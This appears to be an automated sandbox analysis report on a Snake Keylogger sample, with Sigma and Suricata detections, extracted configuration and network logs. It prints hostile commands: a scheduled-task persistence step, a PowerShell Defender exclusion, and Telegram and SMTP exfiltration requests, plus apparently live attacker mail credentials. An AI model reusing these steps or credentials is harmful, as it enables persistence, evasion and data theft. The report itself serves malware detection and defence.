Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe, ParentImage: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe, ParentProcessId: 8888, ParentProcessName: HRrXXnBIpL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", ProcessId: 9040, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 94.199.206.214, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\7495 P.exe, Initiated: true, ProcessId: 8812, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49763

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", ProcessId: 8584, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", ProcessId: 8384, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", ProcessId: 8584, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:43:56.695209+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49763	94.199.206.214	587	TCP
2025-03-14T14:46:11.332243+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49764	94.199.206.214	587	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:44:10.568385+0100	2803305	3	Unknown Traffic	192.168.2.5	49723	104.21.80.1	443	TCP
2025-03-14T14:44:12.991413+0100	2803305	3	Unknown Traffic	192.168.2.5	49728	104.21.80.1	443	TCP
2025-03-14T14:44:14.137604+0100	2803305	3	Unknown Traffic	192.168.2.5	49732	104.21.80.1	443	TCP
2025-03-14T14:44:15.516300+0100	2803305	3	Unknown Traffic	192.168.2.5	49735	104.21.80.1	443	TCP
2025-03-14T14:44:15.674271+0100	2803305	3	Unknown Traffic	192.168.2.5	49736	104.21.80.1	443	TCP
2025-03-14T14:44:17.110578+0100	2803305	3	Unknown Traffic	192.168.2.5	49740	104.21.80.1	443	TCP
2025-03-14T14:44:18.286260+0100	2803305	3	Unknown Traffic	192.168.2.5	49743	104.21.80.1	443	TCP
2025-03-14T14:44:18.367588+0100	2803305	3	Unknown Traffic	192.168.2.5	49744	104.21.80.1	443	TCP
2025-03-14T14:44:21.608477+0100	2803305	3	Unknown Traffic	192.168.2.5	49754	104.21.80.1	443	TCP
2025-03-14T14:44:22.833804+0100	2803305	3	Unknown Traffic	192.168.2.5	49756	104.21.80.1	443	TCP
2025-03-14T14:44:24.092729+0100	2803305	3	Unknown Traffic	192.168.2.5	49760	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:44:08.812284+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	193.122.130.0	80	TCP
2025-03-14T14:44:10.022722+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	193.122.130.0	80	TCP
2025-03-14T14:44:11.293141+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	193.122.130.0	80	TCP
2025-03-14T14:44:12.775236+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49727	193.122.130.0	80	TCP
2025-03-14T14:44:13.605448+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49727	193.122.130.0	80	TCP
2025-03-14T14:44:14.685344+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49734	193.122.130.0	80	TCP
2025-03-14T14:44:16.436934+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:44:20.649079+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49750	149.154.167.220	443	TCP
2025-03-14T14:44:25.393840+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49761	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587"}
Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: 7495 P.exe	Virustotal: Detection: 43%			Perma Link
Source: 7495 P.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mevlutokur@okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: Mo.147258
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mail.okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: garyantonio0934@gmail.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: 587
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor:
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mevlutokur@okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: Mo.147258
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mail.okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: garyantonio0934@gmail.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: 587
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor:
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mevlutokur@okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: Mo.147258
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: mail.okurkardesler.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: garyantonio0934@gmail.com
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor: 587
Source: 2.2.7495 P.exe.478c830.1.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 7495 P.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49725 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2

Source: 7495 P.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 0325FC19h	13_2_0325F974
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 0325F45Dh	13_2_0325F2C0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 0325F45Dh	13_2_0325F4AC
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F83308h	13_2_06F82EF0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F82D41h	13_2_06F82A90
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F83308h	13_2_06F82EEB
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8DD71h	13_2_06F8DAC8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8D919h	13_2_06F8D670
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F83308h	13_2_06F83236
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8D4C1h	13_2_06F8D218
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8EA79h	13_2_06F8E7D0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8E621h	13_2_06F8E378
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F80D0Dh	13_2_06F80B30
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F816F8h	13_2_06F80B30
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8E1C9h	13_2_06F8DF20
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8F781h	13_2_06F8F4D8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8F329h	13_2_06F8F080
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_06F80040
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8EED1h	13_2_06F8EC28
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8D069h	13_2_06F8CDC0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 4x nop then jmp 06F8FBD9h	13_2_06F8F930
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 0176F45Dh	18_2_0176F2C0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 0176F45Dh	18_2_0176F4AC
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 0176FC19h	18_2_0176F961
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DF3308h	18_2_06DF2EF0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DF2D41h	18_2_06DF2A90
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	18_2_06DF0673
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFD919h	18_2_06DFD670
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFEA79h	18_2_06DFE7D0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFE1C9h	18_2_06DFDF20
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFF781h	18_2_06DFF4D8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFEED1h	18_2_06DFEC28
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFD069h	18_2_06DFCDC0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFDD71h	18_2_06DFDAC8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFD4C1h	18_2_06DFD218
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DF3308h	18_2_06DF3236
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFE621h	18_2_06DFE378
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DF0D0Dh	18_2_06DF0B30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DF16F8h	18_2_06DF0B30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFF329h	18_2_06DFF080
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	18_2_06DF0853
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	18_2_06DF0040
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 4x nop then jmp 06DFFBD9h	18_2_06DFF930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49764 -> 94.199.206.214:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49763 -> 94.199.206.214:587
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49761 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:49763 -> 94.199.206.214:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2020:19:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2019:30:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: AEROTEK-ASTR AEROTEK-ASTR

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49727 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49756 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49763 -> 94.199.206.214:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49725 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
